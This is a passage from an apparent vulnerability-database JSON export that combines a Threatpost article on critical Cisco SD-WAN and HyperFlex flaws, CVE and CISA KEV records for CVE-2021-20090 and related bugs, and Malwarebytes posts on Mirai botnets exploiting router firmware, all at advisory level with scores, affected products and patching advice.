Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nUnauthenticated, remote adversaries could mount a cyberattack by submitting crafted input to the service. That would allow them to call privileged actions within the affected system, including creating new administrative level user accounts, the advisory said.\n\nMeanwhile, the local privilege-escalation (LPE) bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking to gain elevated privileges within the system.\n\nSimilarly, CVE-2021-1508, which has a CVSS score of 8.1, is an LPE bug that can also be found in the web-based management interface. It would also allow an authenticated, remote attacker to bypass authorization checking in order to gain access to forbidden applications, make application modifications and also gain elevated privileges.\n\nBoth local bugs exist \u201cbecause the affected software does not perform authorization checks on certain operations,\u201d according to Cisco.\n\nA third locally exploitable bug, CVE-2021-1506, carries a CVSS score of 7.2. It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn\u2019t perform authorization checks on service access.\n\nAnd in all three local cases, an attacker could trigger exploits by sending crafted requests to the affected system.\n\nAnd finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large amount of API requests to a target system to tie it up and prevent it from functioning properly.\n\n\u201cThe vulnerability is due to insufficient handling of API requests to the affected system,\u201d according to Cisco.\n\n## **Cisco HyperFlex HX Command-Injection Bugs**\n\nThe HyperFlex HX software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers \u2013 across both traditional and cloud-native/containerized applications.\n\nCisco [said Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) that multiple vulnerabilities in the platform\u2019s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.\n\nCisco has patched two security bugs in HyperFlex HX in total:\n\n * CVE-2021-1497: Critical Installer Virtual Machine Command-Injection Vulnerability\n * CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability\n\nThe first is a critical flaw with a 9.8 CVSS rating,\n\n\u201cThis vulnerability is due to insufficient validation of user-supplied input,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.\u201d\n\nThe second bug rates 7.2 on the CVSS scale, and is due to insufficient validation of user-supplied input, according to Cisco, which added, \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.\u201d\n\nBoth flaws can be exploited by sending a crafted request to the web-based management interface.\n\nThese are just the latest bugs addressed by the tech behemoth this year. In February, Cisco [addressed a critical vulnerability](<https://threatpost.com/cisco-critical-security-flaw/164255/>) in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it [killed a high-severity flaw](<https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/>) in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-06T17:54:33", "type": "threatpost", "title": "Critical Cisco SD-WAN, HyperFlex Bugs Menace Networks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "modified": "2021-05-06T17:54:33", "id": "THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "href": "https://threatpost.com/critical-cisco-sd-wan-hyperflex-bugs/165923/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cnvd": [{"lastseen": "2022-11-05T11:06:58", "description": "The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are routers from Buffalo Japan.The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 suffer from a path traversal vulnerability, which stems from an input validation error when the web interface handles directory traversal sequences, and can be exploited by attackers to bypass authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "cnvd", "title": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are vulnerable to path traversal", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-07-30T00:00:00", "id": "CNVD-2021-56801", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-56801", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Arcadyan Buffalo firmware contains a path traversal vulnerability that could allow unauthenticated, remote attackers to bypass authentication and access sensitive information. This vulnerability affects multiple routers across several different vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arcadyan Buffalo Firmware Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-20090", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Cisco HyperFlex HX Installer Virtual Machine contains an insufficient input validation vulnerability which could allow an attacker to execute commands on an affected device as the\ufffdtomcat8\ufffduser.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco HyperFlex HX Data Platform Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1498", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Cisco HyperFlex HX Installer Virtual Machine contains an insufficient input validation vulnerability which could allow an attacker to execute commands on an affected device as the\ufffdroot\ufffduser.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco HyperFlex HX Installer Virtual Machine Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1497", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:16:54", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T15:15:00", "type": "cve", "title": "CVE-2021-20090", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2022-04-26T17:05:00", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "id": "CVE-2021-20090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:13:45", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1498", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\)"], "id": "CVE-2021-1498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1498", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\):*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:13:43", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1497", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\)"], "id": "CVE-2021-1497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\):*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:18", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:15:00", "type": "cve", "title": "CVE-2021-38703", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-38703"], "modified": "2021-09-13T14:11:00", "cpe": ["cpe:/o:kpn:experia_wifi_firmware:1.00.15"], "id": "CVE-2021-38703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:kpn:experia_wifi_firmware:1.00.15:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:17:01", "description": "The Telus Wi-Fi Hub (PRV65B444A-S-TS) with firmware version 3.00.20 is affected by an authenticated command injection vulnerability in multiple parameters passed to tr69_cmd.cgi. A remote attacker connected to the router's LAN and authenticated with a super user account, or using a bypass authentication vulnerability like CVE-2021-20090 could leverage this issue to run commands or gain a shell as root on the target device.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T17:15:00", "type": "cve", "title": "CVE-2021-20122", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20122"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:telus:prv65b444a-s-ts_firmware:3.00.20"], "id": "CVE-2021-20122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20122", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:telus:prv65b444a-s-ts_firmware:3.00.20:*:*:*:*:*:*:*"]}], "malwarebytes": [{"lastseen": "2021-08-09T18:34:08", "description": "The early bird catches the worm. Unless the worm was early enough to hide.\n\nOn August 3, 2021 a vulnerability that was discovered by [Tenable](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) was made public. Only two days later, on August 5, [Juniper Threat Labs](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.\n\n### Router firmware\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the [description of CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>) you will find:\n\n> \u201ca path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version &lt;= 1.02 and WSR-2533DHP3 firmware version &lt;= 1.24 could allow unauthenticated remote attackers to bypass authentication.\u201d\n\nBut during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, [Tenable lists](<https://www.tenable.com/security/research/tra-2021-13>) some 36 devices that have been confirmed to be affected. The list of affected devices include some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nThe path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the [Tenable TechBlog](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>).\n\n### Quick response\n\nOnce again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging [CVE-2021-27561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561>) and [CVE-2021-27562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27562>), just hours after vulnerability details were published.\n\n### Mirai\n\nMirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. In this way, it was able to quickly corral an army of small, Internet-connected &quot;smart&quot; devices, like cameras, into a botnet.\n\nYou may remember hearing about this botnet after the [massive East Coast internet outage of 2016](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/iot-antivirus-on-your-smart-device/>) when the Mirai botnet was leveraged in a [DDoS attack](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>) aimed at Dyn, an Internet infrastructure company. Traffic to Dyn&#x27;s Internet directory servers throughout the US\u2014primarily on the East Coast but later on the opposite end of the country as well\u2014was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.\n\nAfter the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.\n\n### Mitigation\n\nThe vulnerability was patched in April and owners of any of the affected devices listed in the table mentioned above are advised to ask their router vendor for security patches. Tenable reported the issues to the [CERT Coordination Center](<https://kb.cert.org/vuls/>) for help with contacting and tracking all the affected vendors.\n\nWhat is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nThe post [Home routers are being hijacked using vulnerability disclosed just 2 days ago](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T17:06:56", "type": "malwarebytes", "title": "Home routers are being hijacked using vulnerability disclosed just 2 days ago", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-08-09T17:06:56", "id": "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-27T12:34:55", "description": "A few weeks ago we blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of a management interfaces that can accessed over the Internet. Both of them are vulnerable to multiple stack buffer overflows due to &quot;unsafe&quot; copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces are failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under 